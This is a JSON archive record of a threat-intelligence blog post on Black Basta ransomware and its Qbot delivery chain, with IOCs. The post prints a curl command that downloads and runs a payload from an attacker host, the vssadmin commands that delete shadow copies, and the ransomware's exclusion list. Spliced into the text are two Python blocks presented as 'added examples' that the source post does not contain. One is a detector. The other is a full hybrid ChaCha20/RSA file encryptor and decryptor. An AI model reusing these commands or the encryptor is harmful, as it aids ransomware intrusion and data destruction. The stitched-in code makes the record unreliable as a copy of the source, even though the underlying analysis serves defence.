{
	"id": "018795e9-ffa3-43fe-a0f6-285c0aadb88c",
	"created_at": "2026-04-06T00:17:45.859431Z",
	"updated_at": "2026-04-10T13:12:12.985316Z",
	"deleted_at": null,
	"sha1_hash": "3ee126b2405d0a93194023932cede158188edf64",
	"title": "Preventing Black Basta Ransomware in 2022 | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 765973,
	"plain_text": "Preventing Black Basta Ransomware in 2022 | Deep Instinct\r\nBy Shaul Vilkomir-Preisman, Threat Intelligence Researcher\r\nPublished: 2022-08-18 · Archived: 2026-04-05 20:16:24 UTC\r\nIntroduction\r\nDespite its recent emergence on the threat landscape, Black Basta ransomware is quickly becoming a significant threat that should be on the radar of SecOps teams worldwide. Black Basta has already executed multiple rapid-fire breaches by using Qakbot/Qbot as its means of delivery, and it also ships a Linux/ESXi variant to amplify its potential impact on a targeted environment.\r\nBlack Basta Origins\r\nLittle is known about the group currently operating Black Basta; however, there may be an association with the now-defunct Conti group based on similarities in both actors’ TOR network sites. It has been suggested that Black Basta is a splinter group that broke off from Conti during the latter’s collapse.\r\nBlack Basta with Qbot – A powerful partner for attack\r\nBlack Basta does not self-propagate. Instead, it relies on Qbot to propagate throughout a targeted environment before leveraging the banking trojan to deliver its payload.\r\nQbot has been a well-known presence on the threat landscape for more than a decade. It is most commonly distributed through large phishing email campaigns, often employing complex, multi-stage downloaders that use multiple file types including Office documents, .HTML files, .ISO, and .LNK files. 
Qbot also employs vulnerability exploits and relatively uncommon techniques such as .DLL side-loading.\r\nA typical Qbot infection chain starts with a thread-hijacked email message: a reply to an existing correspondence, sent from a hijacked email account, intended to trick the recipient into thinking the message comes from someone they know and engage with.\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 1 of 8\n\nFigure 1- Qbot infection email on a pre-existing thread.\r\nThe attached .HTML file contains an embedded, password-protected .ZIP file which is dropped to the user’s Downloads directory when the .HTML file is opened (a technique commonly called HTML smuggling: no download request is ever sent to a server, so web filtering never sees the archive).\r\nFigure 2- Embedded .ZIP file in .HTML.\r\nThe password-protected .ZIP file (the password is provided in the email) contains a .LNK file which executes the following command in order to download the Qbot .DLL payload to the victim’s temp directory as “goAlso.rtf” (a DLL given a document extension; regsvr32 loads it regardless of the name) and execute it using regsvr32.\r\nFigure 3- .LNK file responsible for download and execution of Qbot payload.\r\n%windir%\\System32\\cmd.exe /c %windir%\\system32\\curl -s -o %temp%\\goAlso.rtf http[:]//146[.]70[.]79[.\r\nIn this instance, Qbot’s .DLL payload is signed using a bogus certificate that was still valid at the time of execution and has since been revoked, so a signature check alone would not have stopped it.\r\nFigure 4- Signed Qbot payload .DLL (valid at time of execution).\r\nFollowing initial access, Qbot will employ tools such as Cobalt Strike and AdFind in order to move laterally across the network, enabling RDP log-ons and disabling defenses as it traverses the victim network.\r\nBlack Basta Ransomware in Action\r\nNow we’ll look at how a Black Basta ransomware attack occurs. 
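Before turning to the payload, one way to catch the Qbot delivery chain just described in process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent), as an added example written for this page rather than code from the post or from Deep Instinct. Three rules are applied: command-line curl writing into the user's temp directory, regsvr32 loading a file that is not a .dll or that lives in temp, and, most tellingly, a curl and a regsvr32 that share the same cmd.exe parent and the same file path. The sample events, PIDs and user name are constructed; the trailing regsvr32 invocation is assumed because the post's own command line is truncated; the host 146.70.79.52 and the name goAlso.rtf are from the post.

```python
"""Added example (not from the Deep Instinct post): spot the Qbot delivery
chain described above in process-creation telemetry (Sysmon Event ID 1 or an
EDR equivalent): explorer.exe (user opens the .LNK) -> cmd.exe -> curl writing
a payload into %temp% under a document extension -> regsvr32 loading it."""
import re
import shlex
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str        # full path of the new process
    cmdline: str      # its command line as logged


# Constructed telemetry. PIDs, the user name and the trailing regsvr32 call are
# assumed (the post's own command line is truncated); the host 146.70.79.52 and
# the file name goAlso.rtf come from the post.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(4100, 1200, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4212, 4100, r"C:\Windows\System32\cmd.exe",
              rf"cmd.exe /c curl -s -o {TEMP}\goAlso.rtf http://146.70.79.52/ && regsvr32 {TEMP}\goAlso.rtf"),
    ProcEvent(4220, 4212, r"C:\Windows\System32\curl.exe",
              rf"curl -s -o {TEMP}\goAlso.rtf http://146.70.79.52/"),
    ProcEvent(4231, 4212, r"C:\Windows\System32\regsvr32.exe",
              rf"regsvr32 {TEMP}\goAlso.rtf"),
    # Benign control: an installer registering a real COM DLL from Program Files.
    ProcEvent(5001, 5000, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32 /s "C:\Program Files\Vendor\plugin.dll"'),
]

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|%temp%\\", re.I)
DLL_EXTS = (".dll", ".ocx", ".ax")


def _tokens(cmdline):
    """Windows-style split: backslashes are literal, quoted paths stay whole."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def curl_output(cmdline):
    """Path curl was told to write with -o/--output, or None."""
    toks = _tokens(cmdline)
    for i, t in enumerate(toks[:-1]):
        if t.lower() in ("-o", "--output"):
            return toks[i + 1]
    return None


def regsvr32_target(cmdline):
    """First regsvr32 argument that is not a switch, or None."""
    for t in _tokens(cmdline)[1:]:
        if not t.startswith(("/", "-")):
            return t
    return None


def analyze(events):
    """Return (severity, pid, detail) findings; events must be in time order."""
    findings, downloads = [], {}          # downloads: parent pid -> paths curl wrote
    for ev in events:
        exe = ev.image.rsplit("\\", 1)[-1].lower()
        if exe == "curl.exe":
            out = curl_output(ev.cmdline)
            if out and TEMP_RE.search(out):
                downloads.setdefault(ev.ppid, []).append(out.lower())
                findings.append(("medium", ev.pid, f"curl wrote {out} into the user temp directory"))
        elif exe == "regsvr32.exe":
            target = regsvr32_target(ev.cmdline)
            if not target:
                continue
            if target.lower() in downloads.get(ev.ppid, []):
                findings.append(("critical", ev.pid, f"regsvr32 loaded {target}, which a sibling curl just downloaded"))
            elif not target.lower().endswith(DLL_EXTS) or TEMP_RE.search(target):
                findings.append(("high", ev.pid, f"regsvr32 loaded a non-DLL or temp-directory file: {target}"))
    return findings


if __name__ == "__main__":
    for sev, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"[{sev}] pid {pid}: {detail}")
```

The parent-pid correlation is what separates this chain from an admin running curl or regsvr32 on their own; the two weaker rules still fire individually, which is useful when the EDR does not record the parent. The same three conditions port directly to a SIEM query over process-creation events.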
There are two different variants – the Windows variant and the ESXi variant.\r\nThe Windows variant\r\nBlack Basta is written in C++, does not employ code obfuscation or packing, and contains many hard-coded features, hinting that it may still be a work in progress.\r\nOnce delivered and executed, Black Basta will check for the presence of a hard-coded mutex (“dsajdhas.0”) and, if not found, will create it and proceed to delete the shadow copies present on the victim’s system in order to inhibit recovery:\r\nFigure 5- Mutex Check.\r\nFigure 6- Mutex Creation.\r\nFigure 7- Shadow copy deletion.\r\nThe above partial snippet results in the commands below being executed on the victim’s machine (the SysNative path reaches the 64-bit vssadmin from a 32-bit process; the System32 path covers the native case):\r\ncmd.exe /c C:\\Windows\\SysNative\\vssadmin.exe delete shadows /all /quiet\r\ncmd.exe /c C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet\r\nIf the mutex is found, Black Basta will display a notification and terminate itself:\r\nFigure 8- Mutex detected.\r\nThis single-instance check is common behavior in many types of ransomware.\r\nHow does Black Basta Ransomware work?\r\nFollowing the deletion of shadow copies, Black Basta will modify the system’s wallpaper and set a default file icon for its own “.basta” encrypted file extension; both the image and the icon are hard-coded into the executable and written to the user’s %temp% directory (this technique is also quite common in ransomware).\r\nFigure 9- Sets Wallpaper.\r\nFigure 10- Sets default file icon.\r\nBlack Basta then encrypts files on the victim’s file system, excluding several file system locations and file extensions (including its own, listed below) in order to reduce the chances of completely “breaking” the executing machine; it does this by using a randomly generated ChaCha20 key which is then encrypted using a hard-coded RSA 
public key and appended to the end of every encrypted file.\r\nThe combination of ChaCha20 and RSA is a standard hybrid scheme and was most likely chosen for speed: the stream cipher does the bulk encryption, and the slow asymmetric operation is needed only once per file to wrap the key, which reduces the time it takes to encrypt large amounts of data.\r\nExclusions:\r\n$Recycle.Bin\r\nWindows\r\nDocuments and Settings\r\nLocal Settings\r\nApplication Data\r\nOUT.txt\r\nboot\r\nreadme.txt (its ransom note)\r\ndlaksjdoiwq.jpg (its wallpaper)\r\nNTUSER.DAT\r\nfkdjsadasd.ico (its default file icon)\r\n.com\r\n.exe\r\n.bat\r\n.cmd\r\n.basta (its file extension)\r\nThe ransom note, also hard-coded into the executable, is dropped as “readme.txt” at every file system location that is encrypted and contains a hard-coded “victim ID.” The ransom note refers the reader to the Black Basta operators’ TOR site.\r\nFigure 11- Ransom note.\r\nBlack Basta’s operators can also selectively encrypt specific file system paths by using the built-in “-forcepath” command line parameter and providing a specific path to be encrypted. 
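The hybrid scheme described above (a fresh random ChaCha20 key per file, bulk encryption with it, the key wrapped with a hard-coded RSA public key and appended to the file), as an added example written for this page from the Python standard library; it is not Black Basta's code and not code from the post. It goes one step beyond the post by including the decryptor side, which makes the point of the trailer concrete: the appended blob helps only whoever holds the RSA private key. The 12-byte nonce stored in the trailer, unpadded textbook RSA for the wrap and 512-bit demo keys are assumptions made for the example; the post does not describe the nonce or the padding.

```python
"""Added example, not Black Basta's own code: the hybrid scheme the post
describes, built from the Python standard library. Per file: fresh random
ChaCha20 key, bulk encryption with ChaCha20 (RFC 8439), the key wrapped with
the attacker's RSA public key and appended as a trailer. Assumptions not on
the page: a random 12-byte nonce stored in the trailer, textbook (unpadded)
RSA for the wrap, 512-bit demo keys. decrypt_file() is the operators' side."""
import secrets
import struct

MASK = 0xFFFFFFFF


def _rotl(v, c):
    return ((v << c) & MASK) | (v >> (32 - c))


def _qr(s, a, b, c, d):                      # RFC 8439 quarter round, in place
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block: constants | key | counter | nonce."""
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574,
             *struct.unpack("<8I", key), counter, *struct.unpack("<3I", nonce)]
    w = state[:]
    for _ in range(10):                      # 20 rounds as 10 double rounds
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((w[i] + state[i]) & MASK for i in range(16)))


def chacha20_xor(key, nonce, data, counter=1):
    """Keystream XOR: the same call encrypts and decrypts."""
    out = bytearray(data)
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        for i in range(min(64, len(data) - off)):
            out[off + i] ^= ks[i]
    return bytes(out)


def _probable_prime(n, rounds=24):
    """Miller-Rabin; fine for a demo key, not a hardened key generator."""
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def rsa_keygen(bits=512):
    """Textbook RSA (n, e), (n, d); real use needs 2048+ bits and OAEP padding."""
    def prime(b):
        while True:
            c = secrets.randbits(b) | (1 << (b - 1)) | 1
            if _probable_prime(c):
                return c
    e = 65537
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def encrypt_file(plaintext, pub):
    """Per-file key, bulk ChaCha20, then the key wrapped with the public key.
    Assumed trailer layout: ciphertext || nonce(12) || wrapped key (modulus size)."""
    n, e = pub
    key, nonce = secrets.token_bytes(32), secrets.token_bytes(12)
    body = chacha20_xor(key, nonce, plaintext)
    wrapped = pow(int.from_bytes(key, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")
    return body + nonce + wrapped


def decrypt_file(blob, priv):
    """Operators' decryptor: split the trailer, unwrap the key, rerun the stream."""
    n, d = priv
    klen = (n.bit_length() + 7) // 8
    body, nonce, wrapped = blob[:-12 - klen], blob[-12 - klen:-klen], blob[-klen:]
    key = pow(int.from_bytes(wrapped, "big"), d, n).to_bytes(32, "big")
    return chacha20_xor(key, nonce, body)


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    doc = b"constructed sample document contents\n" * 40
    blob = encrypt_file(doc, pub)
    print(len(doc), "->", len(blob), "bytes; recovered:", decrypt_file(blob, priv) == doc)
```

The speed argument from the text is visible in the code: one modular exponentiation per file, everything else is the stream cipher, and a 2048-bit modulus would only lengthen the trailer. It also shows why the appended key is no help to a victim: without d, the 32-byte key is indistinguishable from the rest of the file.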
The “-forcepath” parameter enables the operators to encrypt specific paths without walking the entire machine, drastically reducing execution time.\r\nFigure 12- Forced path.\r\nExamined Black Basta samples did not contain any data exfiltration mechanism, and it is assumed that exfiltration of data takes place prior to the delivery of the ransomware payload.\r\nThe ESXi variant\r\nBlack Basta’s Linux/ESXi variant is very similar to the Windows variant; both variants contain the same hard-coded ransom note and use the same encryption scheme.\r\nThe ESXi variant encrypts data in “/vmfs/volumes,” which contains all the virtual machine data on an ESXi server, bringing everything that was running on that server to a grinding halt, all without “breaking” the server itself.\r\nAdditionally, it contains the same ability to encrypt specific operating system paths using the “-forcepath” command line parameter.\r\nOf note, this variant can also be executed on Windows systems by means of Windows Subsystem for Linux (WSL), a technique that is attracting growing attention as an attack surface.\r\nConclusion: Black Basta ransomware detection and prevention with Deep Instinct\r\nWhile Black Basta is not particularly sophisticated, its employment of Qbot provides it with ample opportunities for attack. Its Linux/ESXi variant can make it particularly dangerous to organizations, since it can potentially target both Windows workstations and ESXi servers, which host virtual machines that are often critical to an organization’s ongoing operation.\r\nDeep Instinct prevents Black Basta and other advanced malware, pre-execution. Using deep learning models to prevent malicious files from being executed, Deep Instinct can predict and prevent known, unknown, and zero-day threats in \u003c20 milliseconds, 750X faster than the fastest ransomware can encrypt. 
Our deep learning, prevention-first approach allows us to detect and prevent even the most advanced threats with \u003e99% zero-day accuracy.\r\nIf you’d like to learn more about our malware, ransomware, and zero-day prevention capabilities – including our industry-best $3M no-ransomware guarantee – we’d be honored to give you a demo.\r\nIOCs\r\nQbot\r\nCrmReport_948575.html (sha256): 3b5ff11fe11246c91d29cde511a22636524e91e29842dde6327fe92484e08f47\r\nCrmReport_948575.zip (sha256, password = abc123): 7c79cd208b8d052bbc957d70b21dc4f548f2f48e2696005b99ff4ce5cf41f5d1\r\nCrmReport_948575.lnk (sha256): ff4fe3c3f2f6a65f43943b3326dd47686bc48c53a7c6714602c1b547a8e8b538\r\nQbot Payload (sha256): 7385cc993ec169ad06a4e367b5ad65b9d6a231fe385d11fe8c3757d557932e8c\r\nQbot Payload (sha256): 99692f5a1ca26b896d8c3220c42db7adc3007837a9b0d12d60d888f01f92fbbf\r\nPayload Host: http[:]//146.70.79.52/\r\nQbot payload certificate thumbprint (sha1): 2bee3f716b80273db9639376a296cf19cdba0f1a\r\nBlack Basta\r\nBlack Basta Windows Variant (sha256): 203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b\r\nBlack Basta Windows Variant (sha256): 9fce9ee85516533bae34fc1184a7cf31fa9f2c7889b13774f83d1df561708833\r\nBlack Basta Linux/ESXi Variant (sha256): 0d6c3de5aebbbe85939d7588150edf7b7bdc712fceb6a83d79e65b6f79bfc2ef\r\nBlack Basta TOR site: https[:]//aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion/\r\nBlack Basta – Victim system IOCs\r\nMutex: dsajdhas.0\r\nWallpaper: %temp%\\dlaksjdoiwq.jpg\r\nFile Icon: %temp%\\fkdjsadasd.ico\r\nRegistry: HKCR\\.basta\\\r\nSource: https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence"
	],
	"report_names": [
		"black-basta-ransomware-threat-emergence"
	],
	"threat_actors": [],
	"ts_created_at": 1775434665,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.pdf",
		"text": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.txt",
		"img": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.jpg"
	}
}